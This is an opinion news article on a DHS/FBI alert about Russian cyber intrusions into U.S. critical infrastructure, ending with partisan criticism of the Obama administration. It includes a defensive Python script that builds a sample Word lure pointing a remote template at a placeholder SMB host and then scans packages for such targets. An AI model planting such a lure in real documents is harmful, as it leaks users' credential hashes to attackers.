The FBI and Homeland Security (DHS) have announced that Russia repeatedly cyber-attacked America’s energy, water, aviation and manufacturing facilities.
The alert describes “indicators of compromise and technical details on the tactics, techniques, and procedures used by Russian government cyber actors on compromised victim networks.”
DHS and FBI characterize this attack as,
“A multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS). Since at least March 2016, Russian government cyber actors targeted government entities and multiple U.S. critical infrastructure sectors.”
Russia attacked two distinct categories of victims, according to the FBI and DHS: staging and intended targets.
“The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as ‘staging targets.’ The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims.”
Moscow used a variety of cyber tactics, including spear-phishing emails (sent from compromised legitimate accounts), watering-hole domains, credential gathering, open-source and network reconnaissance, host-based exploitation, and targeting of industrial control system (ICS) infrastructure.
The attackers used email attachments that leveraged a Microsoft Office feature for retrieving a document (such as an attached template) from a remote server over the Server Message Block (SMB) protocol. As part of Microsoft Word's standard handling of that request, the client authenticates to the server, sending the user's credential hash (the NTLM challenge-response) to the attacker-controlled host before the requested file is retrieved. After obtaining the credential hash, the threat actors can use password-cracking techniques to recover the plaintext password (or relay the authentication directly), and with valid credentials they are able to masquerade as authorized users.
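The technique above leaves a static trace in the document itself: an Office file is a zip package, and a remote template or other external content is declared as a relationship with TargetMode="External" in one of the package's .rels parts. The following triage script is an added example written for this page, not code from the DHS/FBI alert; it builds a constructed minimal .docx carrying such a relationship (the 192.0.2.10 address and Normal.dotm file name are placeholders, not indicators from the alert) and then scans any package for external targets that would cause Word to open an SMB connection.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by every part-relationship file (word/_rels/*.rels) in an OOXML package.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")

# Targets that Windows resolves over SMB: file: URLs and UNC paths (\\host\share or //host/share).
SMB_TARGET = re.compile(r"^(file:|\\\\|//)", re.IGNORECASE)


def build_sample_docx(template_target):
    """Constructed sample: the smallest zip that looks enough like a .docx to carry an
    attached-template relationship pointing at `template_target`. Not a real malicious file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/'
                   'package/2006/content-types"/>')
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        # This is the part a remote-template lure relies on: settings.xml -> external template.
        z.writestr("word/_rels/settings.xml.rels",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   f'<Relationships xmlns="{RELS_NS}">'
                   f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                   f'Target="{template_target}" TargetMode="External"/>'
                   '</Relationships>')
    return buf.getvalue()


def find_external_targets(docx_bytes):
    """Return (part_name, short_relationship_type, target) for every external relationship
    in the package, whatever part declares it (templates, linked images, OLE links, ...)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((name, rel_type, rel.get("Target", "")))
    return hits


def smb_fetch_targets(docx_bytes):
    """Subset of external targets that would make Word authenticate over SMB on open."""
    return [h for h in find_external_targets(docx_bytes) if SMB_TARGET.match(h[2].strip())]


if __name__ == "__main__":
    # Constructed lure: remote template on a placeholder host (RFC 5737 documentation address).
    lure = build_sample_docx("file://192.0.2.10/Normal.dotm")
    for part, rel_type, target in smb_fetch_targets(lure):
        print(f"SMB fetch on open: {part} ({rel_type}) -> {target}")
    # A benign HTTPS template reference is reported as external but not as an SMB fetch.
    print(smb_fetch_targets(build_sample_docx("https://example.com/corp.dotm")))
```

The scan is deliberately broad: it walks every .rels part rather than only settings.xml.rels, because linked images, OLE objects and hyperlinks can carry the same kind of external target. A complementary network-level control is to block outbound SMB (TCP 445) at the perimeter so the authentication attempt never reaches an external host.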
Throughout the tenure of the Obama Administration, acts of both physical and cyber aggression by America’s enemies were not responded to by the most pacifist presidency in U.S. history. There was virtually no substantive reaction by Obama to China’s incursion into the exclusive economic zone of the Philippines, or to Russia’s invasion of the Ukraine, or to the attack on the American facility in Benghazi which resulted in the death of a U.S. Ambassador. As China, Russia, and North Korea moved ahead at unprecedented levels in their armaments programs, Obama reduced spending on U.S. defenses.
The Obama Administration consistently failed to respond to Russian cyber attempts to target the U.S., both in terms of infrastructure as well as in the electoral process. Ali Watkins, writing for Politico, reported,
“The Obama administration received multiple warnings from national security officials between 2014 and 2016 that the Kremlin was ramping up its intelligence operations and building disinformation networks it could use to disrupt the U.S. political system, according to more than half a dozen current and former officials. […] Politico spoke with more than a dozen current and former officials from across the national security spectrum, including intelligence agencies, the State Department and the Pentagon. Almost all said they were aware of Russia’s aggressive cyberespionage and disinformation campaigns […] but felt that either the White House or key agencies were unwilling to act forcefully to counter the Russian actions. Intelligence officials ‘had a list of things they could never get the signoffs on,’ one intelligence official said. ‘The truth is, nobody wanted to piss off the Russians.’”
Frank Vernuccio serves as the editor-in-chief of the New York Analysis of Policy and Government.